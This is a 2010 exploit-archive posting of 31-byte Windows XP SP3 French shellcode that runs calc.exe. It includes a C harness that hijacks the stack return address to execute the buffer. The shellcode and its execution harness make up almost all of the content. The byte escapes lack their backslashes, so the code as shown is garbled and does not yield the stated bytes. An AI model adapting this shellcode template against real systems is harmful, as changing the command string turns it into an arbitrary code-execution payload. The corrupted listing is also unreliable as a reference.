win32/xp sp3 Fr (calc.exe) Shellcode 31 bytes
Posted on 18 May 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>win32/xp sp3 Fr (calc.exe) Shellcode 31 bytes</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>============================================= win32/xp sp3 Fr (calc.exe) Shellcode 31 Bytes ============================================= /* | Title: Windows Xp Pro SP3 Fr (calc.exe) Shellcode 31 Bytes | Type: Shellcode | Author: agix | Platform: win32 */ #include <stdio.h> char shellcode[] = "xEBx10" //jmp short 0x12 "x5B" //pop ebx "x53" //push ebx "xBBxADx23x86x7C" //mov ebx, 0x7c8623ad "xFFxD3" //call ebx "xBBxFAxCAx81x7C" //mov ebx, 0x7c81cafa "xFFxD3" //call ebx "xE8xEBxFFxFFxFF" //call dword 0x2 //db calc.exe "x63x61x6Cx63x2Ex65x78x65"; int main(int argc, char **argv) { int *ret; ret = (int *)&ret + 2; (*ret) = (int) shellcode; } # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-05-18]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>